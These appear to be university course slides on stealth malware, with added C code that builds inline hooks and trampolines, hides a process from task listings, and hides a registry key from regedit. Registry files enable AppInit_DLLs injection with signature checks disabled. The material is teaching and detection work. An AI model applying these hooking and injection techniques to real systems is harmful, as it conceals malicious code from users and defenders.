Revealing Stealth Malware, UMD CMSC389M. Xeno Kovah – Jan. 2013. xkovah at gmail, subject line starting with "UMD:"
All materials are licensed under a Creative Commons "Share Alike" license. • http://creativecommons.org/licenses/by-sa/3.0/
Outline • Persistence • Type 1 – use system features • Hiding in plain sight • Hiding with filesystem attributes • Trojan DLL + forwarded exports • Type 2 – change things that shouldn't be changed • Inline hooks • A userspace OR kernel technique
Memory is not persistent • Malware executes in memory • Malware generally wants to stick around across reboots • So naturally it would like to persist on disk • But persisting on disk is not enough: something has to invoke it again after every reboot • Windows includes a number of registry locations where code can register that it would like to be executed at a particular time (system boot, user logon, or the start of a common process like IE)
Autoruns.exe • This Sysinternals tool examines an (AFAIK) exhaustive list of locations that code can register itself to either be automatically executed on system startup, or executed when some common process like IE is started. • Practical use: enable code-signature verification, hide the signed Microsoft entries, and compare against a known-clean baseline; the unsigned or unfamiliar entries are where to look first.
Autoruns' Achilles' heel • Autoruns is not registry hiding aware: it queries the registry through the same APIs as any other program, so a rootkit that hooks those APIs hides its autostart entry from Autoruns too. • That's part of why the homework assignments are designed around registry key hiding
Service Control Manager (SCM) • The SCM is driven from the command line with sc.exe, or programmatically with APIs like CreateService() • In the development environment setup, load.bat uses sc.exe to register and load the HelloKernel.sys kernel driver as a service. • The SCM can be used to register a kernel driver or a userspace program to load on system boot or on demand. • A side effect of using the SCM is that it creates a registry entry under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services, which is one of the locations Autoruns (and anyone doing forensics) checks.
Malware can also persist by infecting the binaries which are executed in the earliest stages of bootup (the MBR/bootloader "bootkit" approach, e.g. the Stoned bootkit). Examining these requires more specialized tools & knowledge. From http://www.stoned-vienna.com/downloads/Presentation.pdf
Type 1 Stealth Malware: Use legitimate system features Hiding in plain sight
Hiding in Plain Sight • This means to make your software look like legitimate software, to a cursory examination • Somewhat related to trojans, though there need not necessarily be any sort of install-time subterfuge. More focused on if someone stumbles upon it later. • Strategies include naming your files like legitimate MS or 3rd party software,
Hiding in Plain Sight 2 • The key feature of such malware is that if you know where the malware is, you can see it with normal tools. • Because of that, we're not going to spend much time on them • They rely more on AV bypassing to stay on home systems, and lack of application whitelisting or even new application installation awareness to stay on enterprise systems.
Examples • Stuxnet named its drivers mrxnet.sys and mrxcls.sys. There are legitimate Microsoft files named mrxsmb.sys and mrxdav.sys. • However, later versions were signed by stolen RealTek Semiconductor & JMicron Technology certificates, so those two aspects in some way run counter to each other • Zeus and other crimeware do not hide their files/registry keys (though they do often protect them)
Hiding with Filesystem Features • The "attrib +h" command on Windows sets the hidden file attribute, which makes the file invisible if the user is running Explorer.exe with the default folder options. • Setting "+h +s" (hidden + system) keeps it invisible even when "show hidden files" is on, because Explorer separately hides "protected operating system files" by default.
Hiding with Filesystem Features 2 • Use "dir /AH" to see hidden files, and "dir /AS" to see system files. Or edit Explorer's folder options as shown in the screenshot (on Windows 7 hit "alt" once to show the Tools menu): check "Show hidden files and folders", uncheck "Hide extensions for known file types", uncheck "Hide protected operating system files".
Hiding with Filesystem Features 3 • NTFS supports "Alternate Data Streams" (ADS) • An ADS can be created and opened with the normal file access APIs; its name is just the file name followed by a colon and the stream name. E.g. if you have a file foo.txt you can do "notepad foo.txt:bar" and you will be editing a new "bar" stream attached to foo.txt. The file's size as shown by dir and Explorer does not include the stream.
Hiding with Filesystem Features 4 • No built-in way to see ADS on XP. Vista and later added a /R flag to the dir command ("dir /R"), but Explorer.exe still does not show them. • On XP, LADS (http://www.heysoft.de/en/software/lads.php) or the Sysinternals Streams tool (streams.exe, which can also delete streams with -d) is the way to go, though the good rootkit detectors will allow for viewing ADS too.
Misleading extension and/or icon • Windows hides known file extensions (".exe", ".txt", ".jpg", ...) by default, so a file named "report.pdf.exe" is displayed as "report.pdf". • An executable's icon comes from its own icon resource, so it can be given the PDF or image icon to match. • Uncheck "Hide extensions for known file types" in the folder options to see the real extension.
Stuxnet trojaned DLL • A forwarded export is an export-table entry that, instead of pointing at code in this DLL, names a function in another module ("othermodule.Function"); the loader resolves the import there. A trojan DLL can therefore implement only the functions it wants to intercept and forward everything else to the original (renamed) DLL, so the application keeps working. • Stuxnet used forwarded exports for the 93 of 109 exports in s7otbxdx.dll which it didn't need to intercept. From http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf
Stuxnet trojaned DLL 2 (figure: the export table of the trojaned s7otbxdx.dll) From http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf
STEALTH MALWARE (will cut you!) Malware that hides by changing something that shouldn't legitimately change
A portrait of the rootkit as a young man in the middle (CC BY-NC-SA 2.0) image by thrill kills sunday pills http://www.flickr.com/photos/27086700@N03/2994587384/in/photostream/
Inline Hooked Intra-Module Function Call (before the hook)

WickedSweetApp.exe
  ...
  push 1234
  call SomeFunc       ; (1) transfer to SomeFunc
  add esp, 4          ; (2) SomeFunc's ret lands here
  ...
SomeFunc:
  mov edi, edi        ; 2 bytes (8B FF)  \
  push ebp            ; 1 byte  (55)      } 5-byte "hotpatch" prologue
  mov ebp, esp        ; 2 bytes (8B EC)  /
  sub esp, 0x20       ; SomeFunc+5
  ...
  ret
Inline Hooked Intra-Module Function Call (after the hook)

WickedSweetApp.exe
  ...
  push 1234
  call SomeFunc       ; (1) transfer to SomeFunc as before
  add esp, 4          ; (4) the original body's ret still lands here
  ...
SomeFunc:
  jmp EvilFunc        ; (2) E9 rel32 overwrote the 5-byte prologue
  sub esp, 0x20       ; SomeFunc+5, untouched
  ...
  ret

WickedWickedDll.dll
EvilFunc:
  <stuff>             ; inspect/modify arguments, call the original, filter results
  ...
  mov edi, edi        ; the 3 displaced instructions, replayed (the "trampoline")
  push ebp
  mov ebp, esp
  jmp SomeFunc+5      ; (3) resume the original body past the patch

The overwritten bytes must be whole instructions totaling at least 5 bytes and must not contain position-dependent operands (relative branches), or the copy replayed in the trampoline will misbehave. The mov edi,edi / push ebp / mov ebp,esp sequence is exactly 5 bytes with no relative references, which is why Microsoft emits it as a hotpatch point; a general-purpose hook needs a length disassembler to find a safe cut.
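The byte-level arithmetic behind the 5-byte hook drawn above, as an added example (this is not code from the slides or from any of the malware discussed). Addresses, module ranges and the target prologue are constructed; on a real target you would additionally need VirtualProtect() to make the code page writable, which is left out so the example runs on any host.

```c
/* Added example, not code from the slides: building a 5-byte x86 inline hook
 * and its trampoline, plus the check a detector performs. Addresses and the
 * prologue bytes are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HOOK_LEN 5  /* E9 rel32 is 5 bytes; the MS hotpatch prologue is also 5 */

/* Constructed prologue of SomeFunc: mov edi,edi / push ebp / mov ebp,esp / sub esp,0x20 */
static const uint8_t some_func_bytes[] = { 0x8B,0xFF, 0x55, 0x8B,0xEC, 0x83,0xEC,0x20 };
static const uint8_t hotpatch_prologue[HOOK_LEN] = { 0x8B,0xFF, 0x55, 0x8B,0xEC };

/* rel32 for a JMP at `from` landing on `to`: x86 branches are relative to the
 * address of the *next* instruction, i.e. from + 5. */
static int32_t jmp_rel32(uint32_t from, uint32_t to) {
    return (int32_t)(to - (from + HOOK_LEN));
}

/* Emit E9 <rel32, little-endian> into out[0..4]. */
static void encode_jmp(uint8_t out[HOOK_LEN], uint32_t from, uint32_t to) {
    uint32_t rel = (uint32_t)jmp_rel32(from, to);
    out[0] = 0xE9;
    for (int i = 0; i < 4; i++) out[1 + i] = (uint8_t)(rel >> (8 * i));
}

/* Inverse: where does the E9 jmp stored at address `at` go? This is also
 * what a detector computes when a function begins with E9. */
static uint32_t decode_jmp_target(const uint8_t in[HOOK_LEN], uint32_t at) {
    uint32_t rel = 0;
    for (int i = 0; i < 4; i++) rel |= (uint32_t)in[1 + i] << (8 * i);
    return at + HOOK_LEN + rel;   /* unsigned wraparound == signed add */
}

/* Trampoline = the 5 displaced prologue bytes + jmp back to SomeFunc+5.
 * Returns the trampoline size. Precondition: the displaced bytes are whole
 * instructions with no relative operands (true for the hotpatch prologue). */
static size_t build_trampoline(uint8_t *tramp, uint32_t tramp_addr,
                               const uint8_t *func, uint32_t func_addr) {
    memcpy(tramp, func, HOOK_LEN);
    encode_jmp(tramp + HOOK_LEN, tramp_addr + HOOK_LEN, func_addr + HOOK_LEN);
    return 2 * HOOK_LEN;
}

/* Overwrite the first 5 bytes of (a copy of) SomeFunc with jmp EvilFunc.
 * Returns 1 on success, 0 if the prologue is not the expected hotpatch
 * sequence: patching blindly over another prologue would split an
 * instruction and crash the first caller. */
static int install_hook(uint8_t *func, uint32_t func_addr, uint32_t evil_addr) {
    if (memcmp(func, hotpatch_prologue, HOOK_LEN) != 0) return 0;
    encode_jmp(func, func_addr, evil_addr);
    return 1;
}

/* Detector's view: a function whose first instruction is a jmp leaving its
 * own module [mod_lo, mod_hi) is almost certainly inline hooked. */
static int jmp_leaves_module(const uint8_t *func, uint32_t func_addr,
                             uint32_t mod_lo, uint32_t mod_hi) {
    if (func[0] != 0xE9) return 0;
    uint32_t tgt = decode_jmp_target(func, func_addr);
    return tgt < mod_lo || tgt >= mod_hi;
}

int main(void) {
    /* Constructed layout: app at 0x00400000, SomeFunc at 0x00401000,
       WickedWickedDll at 0x10000000, EvilFunc at 0x10001000, trampoline at 0x10002000 */
    const uint32_t some_func = 0x00401000, evil_func = 0x10001000, tramp_at = 0x10002000;
    uint8_t func[sizeof some_func_bytes], tramp[2 * HOOK_LEN];
    memcpy(func, some_func_bytes, sizeof func);

    size_t tlen = build_trampoline(tramp, tramp_at, func, some_func); /* save original first */
    install_hook(func, some_func, evil_func);

    printf("SomeFunc now starts with:");
    for (int i = 0; i < HOOK_LEN; i++) printf(" %02X", func[i]);
    printf("  -> jmp 0x%08X\n", decode_jmp_target(func, some_func));
    printf("trampoline (%zu bytes) ends with jmp 0x%08X\n", tlen,
           decode_jmp_target(tramp + HOOK_LEN, tramp_at + HOOK_LEN));
    printf("hooked? %d\n", jmp_leaves_module(func, some_func, 0x00400000, 0x00410000));
    return 0;
}
```

Note the order in main: the trampoline is built from the original bytes before the hook is written, since afterwards those bytes are gone. jmp_leaves_module() is the same check a rootkit detector applies to every exported function of a loaded module.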
Hooking • We call the act of redirecting program execution "hooking" • Because you're hooking into the program to make it come to you
So what functions would an attacker want to hook? • Depends on what they're trying to hide, but the principle always is: Find whatever function shows that which you wish to hide, and hook it. • Well dang, I guess we're going to need to learn how programs view "stuff"
To the Googles! Or better yet
RTFMSDN! • FindFirstFile() - http://msdn.microsoft.com/en-us/library/windows/desktop/aa364418(v=vs.85).aspx • FindNextFile() - http://msdn.microsoft.com/en-us/library/windows/desktop/aa364428(v=vs.85).aspx • FindClose() - http://msdn.microsoft.com/en-us/library/windows/desktop/aa364413(v=vs.85).aspx
Everything you ever wanted to know about the x86-64 calling convention (but that OST Intro x86 didn't tell you) • Going to be in the updated version, "Intro x86-64", recorded in Feb • This is the Microsoft x64 convention (Linux/BSD use the different System V convention) • Argument 1 is in rcx • Argument 2 is in rdx • Argument 3 is in r8 • Argument 4 is in r9 • Any further arguments are on the stack • Floating-point arguments go in xmm0–xmm3 instead • The caller also reserves 32 bytes of "shadow space" on the stack above the return address, which the callee may use to spill the four register arguments • Return value is still in rax • Practical consequence for hooks: a hook function must be declared with the same prototype as the original so the compiler reads the arguments from the right registers
WiiiiinDebugging, across the universe! • Windbg uses function name notation like "module!function" • I will set breakpoints on things like • kernel32!FindFirstFileExW, kernel32!FindFirstFileW, kernel32!FindFirstFileA, kernel32!FindNextFileW, kernel32!FindNextFileA • The W or A at the end means the "Wide" (UTF-16) or ANSI string version • The A versions usually convert their strings and call the W version, but hook both rather than assume it
Win 7 DLL Injection • See http://en.wikipedia.org/wiki/DLL_injection for more ways that this can be achieved on Windows/*nix • We're going to use the AppInit_DLLs way of doing this for simplicity: every process that loads user32.dll also loads the DLLs listed there • Note: AppInit_DLLs' behavior changed in releases after XP; it is now off by default and has to be enabled with Administrator-level permissions. • Set the DLL path in the registry value: • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs • Use comma delimitation if there is an existing entry • Must also set the following value to 1 • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs • Must also set the following value to 0, otherwise only code-signed DLLs are loaded • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\RequireSignedAppInit_DLLs • On 64-bit Windows the key above governs 64-bit processes; 32-bit processes read the copy under HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows, and the DLL's bitness must match the process that loads it
Example use of AppInit_DLLs for XP DLL injection • http://www.codeproject.com/KB/vista/api-hooks.aspx • This will hook NtQuerySystemInformation(), which is what taskmgr.exe uses in order to list the currently running processes. It will replace this with HookedNtQuerySystemInformation(), which will hide calc.exe • I modified that code to use IAT hooking rather than inline (which is much simpler actually) • Steps: • Compile AppInitHookIAT.dll • Place it at C:\tmp\AppInitHookIAT.dll for simplicity • Use regedit.exe to add C:\tmp\AppInitHookIAT.dll as the value for the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs and set the other values from the previous slide • Start calc.exe, start taskmgr.exe, confirm that calc.exe doesn't show up in the list of running processes. • Remove C:\tmp\AppInitHookIAT.dll from AppInit_DLLs and restart taskmgr.exe. • Confirm calc.exe shows up in the list of running processes. • (This is a basic "userspace rootkit" technique. Because of this, all entries in this registry key should always be looked upon with suspicion.)
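What the hook actually has to do once it sits in front of NtQuerySystemInformation(), as an added example (this is not the CodeProject code the slide points to): the real function fills the caller's buffer with a chain of process records linked by NextEntryOffset, and HookedNtQuerySystemInformation() then splices the calc.exe record out of that chain before returning. The record layout below is a simplified, assumed stand-in for SYSTEM_PROCESS_INFORMATION so the code compiles on any host, and the process list is constructed; on Windows you would use the real struct from winternl.h and call the original function first.

```c
/* Added example, not the CodeProject hook the slide refers to: the
 * filtering step performed on the buffer after the real
 * NtQuerySystemInformation(SystemProcessInformation, ...) returned.
 * The record layout is a simplified stand-in (assumption); the list is constructed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    uint32_t NextEntryOffset;  /* bytes to the next record, 0 on the last (as in the real struct) */
    uint32_t UniqueProcessId;
    char     ImageName[32];    /* real struct: UNICODE_STRING; narrow here for simplicity */
} proc_info_t;

#define NEXT_REC(p) ((proc_info_t *)((uint8_t *)(p) + (p)->NextEntryOffset))

/* Constructed "real API output": lay the names out as a chain. Returns bytes used. */
static size_t build_process_list(uint8_t *buf, const char *const *names, size_t n) {
    proc_info_t *rec = (proc_info_t *)buf;
    for (size_t i = 0; i < n; i++, rec++) {
        rec->NextEntryOffset = (i + 1 < n) ? (uint32_t)sizeof *rec : 0;
        rec->UniqueProcessId = (uint32_t)(i * 4);
        snprintf(rec->ImageName, sizeof rec->ImageName, "%s", names[i]);
    }
    return n * sizeof(proc_info_t);
}

/* The hook's work: splice every record named `hide` out of the chain. The
 * record's bytes stay in the buffer, but a walker following NextEntryOffset
 * never reaches them. Returns how many records were hidden. */
static size_t hide_process(uint8_t *buf, size_t buf_len, const char *hide) {
    size_t hidden = 0;
    proc_info_t *prev = NULL, *cur = (proc_info_t *)buf;
    while (cur) {
        proc_info_t *next = cur->NextEntryOffset ? NEXT_REC(cur) : NULL;
        if (strcmp(cur->ImageName, hide) != 0) { prev = cur; cur = next; continue; }
        if (prev) {
            /* Middle or last record: make prev jump over cur (0 if cur was last). */
            prev->NextEntryOffset = next ? prev->NextEntryOffset + cur->NextEntryOffset : 0;
            hidden++;
            cur = next;
        } else if (next) {
            /* First record: no prev to re-point, so slide the rest of the buffer
             * down over it. Offsets are relative, so the tail stays consistent. */
            size_t rec_len = (size_t)((uint8_t *)next - (uint8_t *)cur);
            size_t tail    = buf_len - (size_t)((uint8_t *)next - buf);
            memmove(cur, next, tail);
            buf_len -= rec_len;
            hidden++;                  /* cur now holds the old next; re-examine it */
        } else {
            cur = NULL;                /* sole record: nothing to splice to, leave it */
        }
    }
    return hidden;
}

/* What taskmgr effectively does: walk the chain and count. */
static size_t count_visible(const uint8_t *buf) {
    size_t n = 0;
    for (const proc_info_t *p = (const proc_info_t *)buf; ; p = NEXT_REC(p)) {
        n++;
        if (p->NextEntryOffset == 0) return n;
    }
}

static int is_visible(const uint8_t *buf, const char *name) {
    for (const proc_info_t *p = (const proc_info_t *)buf; ; p = NEXT_REC(p)) {
        if (strcmp(p->ImageName, name) == 0) return 1;
        if (p->NextEntryOffset == 0) return 0;
    }
}

int main(void) {
    const char *const names[] = { "System Idle Process", "System", "calc.exe", "taskmgr.exe", "calc.exe" };
    uint8_t buf[8 * sizeof(proc_info_t)];
    size_t len = build_process_list(buf, names, 5);
    printf("before: %zu processes\n", count_visible(buf));
    size_t h = hide_process(buf, len, "calc.exe");
    printf("after hiding %zu x calc.exe: %zu processes, calc visible=%d, taskmgr visible=%d\n",
           h, count_visible(buf), is_visible(buf, "calc.exe"), is_visible(buf, "taskmgr.exe"));
    return 0;
}
```

The two edge cases are the ones that trip up a first attempt: a hidden record at the very end must leave the previous record's NextEntryOffset at 0 (not pointing past the data), and a hidden record at the very front has no predecessor to re-point. A detector that compares this API's output against another enumeration path (for example the PID list from the kernel's handle table, or simply CreateToolhelp32Snapshot from an unhooked process) will see the discrepancy.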
Stuxnet use of inline hooks • From the Stuxnet Dossier: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf • "~WTR4141.tmp then loads ~WTR4132.tmp, but before doing so, it attempts to hide the files on the removable drive. Hiding the files on the removable drive as early in the infection process as possible is important for the threat since the rootkit functionality is not installed yet, as described in the Windows Rootkit Functionality section. Thus, ~WTR4141.tmp implements its own less-robust technique in the meantime. • WTR4141.tmp hooks the following APIs from kernel32.dll and Ntdll.dll: • From Kernel32.dll • FindFirstFileW • FindNextFileW • FindFirstFileExW • From Ntdll.dll • NtQueryDirectoryFile • ZwQueryDirectoryFile"
Homework 1 • Use AppInit_DLLs DLL injection with inline or IAT hooking to hide any registry key named "UMDRK" from Regedit.exe on Windows 7 64 bit. But in particular make sure you hide • HKLM\SYSTEM\CurrentControlSet\Services\UMDRK
High level HW1 steps • 1) Convert the module-finding inline asm to C code (the Microsoft compilers do not allow inline asm in 64-bit builds). Start from the __readgsqword() intrinsic; on x64 the PEB pointer lives at gs:[0x60] • 2) Figure out which Windows APIs are used to list registry entries & create fake versions that behave differently when they are trying to view the specified key • 3) Set up a MitM situation either through inline hooking (overwriting the target function's first instructions) or through IAT entry changing • NOTE1: Your solution should cause the specified registry key to be hidden, but should *not* cause any subsequent registry keys to be hidden • NOTE2: Your solution should be generic, and not build in assumptions based on analyzing regedit (e.g. not just skipping directly to some offset to make some modification.) It must programmatically find the location(s) to change. You should probably test it against some other registry reading tools to make sure it is actually generic enough.
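The property NOTE1 demands, shown on an index-based enumeration as an added example (not part of the course materials). Win32 registry enumeration is index based: the caller asks for subkey 0, 1, 2, ... until it gets ERROR_NO_MORE_ITEMS, so a hook that hides one subkey has to translate the caller's indices into the real ones. Which real API regedit calls is left to the student, as the slide says; the "real" enumerator here is an assumed stand-in over a constructed key list.

```c
/* Added example, not part of the course materials: hiding one item from an
 * index-based enumeration without disturbing the items after it. The real
 * enumerator is a stand-in (assumption) over a constructed subkey list. */
#include <stdio.h>
#include <string.h>

#define ERROR_SUCCESS       0L
#define ERROR_NO_MORE_ITEMS 259L   /* real Win32 value */

/* Constructed subkeys of ...\CurrentControlSet\Services, in enumeration order. */
static const char *const k_real_keys[] = { "Tcpip", "UMDRK", "UmPass", "WinDefend" };
#define N_REAL (sizeof k_real_keys / sizeof k_real_keys[0])

/* Stand-in for the original, unhooked enumerator (what the saved IAT entry or
 * the trampoline would reach): copies the name at `index`, or reports the end. */
static long real_enum(unsigned index, char *name, size_t name_len) {
    if (index >= N_REAL) return ERROR_NO_MORE_ITEMS;
    snprintf(name, name_len, "%s", k_real_keys[index]);
    return ERROR_SUCCESS;
}

/* The hook. The caller's index counts *visible* items, so walk the real list
 * from 0, skip every `hide`, and stop at the index-th survivor. The naive
 * "call real_enum(index + 1) once past the hidden slot" only works for one
 * hidden key at a known position; this form handles any number of hidden
 * items anywhere and returns ERROR_NO_MORE_ITEMS one slot early, exactly as
 * if the key did not exist. */
static long hooked_enum(unsigned index, char *name, size_t name_len, const char *hide) {
    unsigned visible = 0;
    for (unsigned real = 0; ; real++) {
        long rc = real_enum(real, name, name_len);
        if (rc != ERROR_SUCCESS) { name[0] = '\0'; return rc; }
        if (strcmp(name, hide) == 0) continue;        /* skip without counting */
        if (visible == index) return ERROR_SUCCESS;
        visible++;
    }
}

/* Drive the hook the way regedit drives the real API; returns the item count. */
static unsigned list_through_hook(const char *hide, char out[][64], unsigned max) {
    unsigned n = 0;
    char name[64];
    while (n < max && hooked_enum(n, name, sizeof name, hide) == ERROR_SUCCESS) {
        snprintf(out[n], 64, "%s", name);
        n++;
    }
    return n;
}

int main(void) {
    char seen[8][64];
    unsigned n = list_through_hook("UMDRK", seen, 8);
    printf("%u keys visible through the hook:", n);
    for (unsigned i = 0; i < n; i++) printf(" %s", seen[i]);
    printf("\n");
    return 0;
}
```

Rescanning from 0 on every call makes each enumeration O(n²); a production hook remembers how many hidden entries precede the requested index instead. Two things this example deliberately does not do, which the homework still needs: restrict the filtering to enumerations of the parent key that actually contains UMDRK (the hook sees a key handle, not a path, so it has to resolve it), and hook the query-by-name path as well, since a tool that opens the key directly is not affected by index translation.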
Helpful tools for HW1 • Win 7 x64 (VM recommended) • to test on • VisualStudio 2010 Express • to compile code • WinDbg x86-64 aka "amd64" • to look at structure definitions • PEView & CFF Explorer • to look at PE headers • Process Monitor • helpful for inferring what functions map to what registry actions that are done by regedit to read the key
Build as DLL FYI, the one change I made to the template projects, that you wouldn't have seen in the instructions for setting up the devenv, was to change the project to make a DLL, like so:
For easy install enter the following into a file named "install.reg" that you can double click (you will still need to make C:\tmp and copy your compiled file to C:\tmp before running this):

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\tmp\\StudentAppInitHookIAT.dll"
"LoadAppInit_DLLs"=dword:00000001
"RequireSignedAppInit_DLLs"=dword:00000000

OR, for the inline-hook build (only the DLL name differs):

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\tmp\\StudentAppInitHookInline.dll"
"LoadAppInit_DLLs"=dword:00000001
"RequireSignedAppInit_DLLs"=dword:00000000

Note that the backslashes in the path are doubled: .reg files use C-style escaping inside quoted strings.
For easy uninstall enter the following into a file named "uninstall.reg" that you can double click. It just empties AppInit_DLLs, so the same file works for both builds; processes that already loaded the DLL keep it until they restart. To get back to the Windows default you can additionally set "LoadAppInit_DLLs"=dword:00000000 and "RequireSignedAppInit_DLLs"=dword:00000001.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=""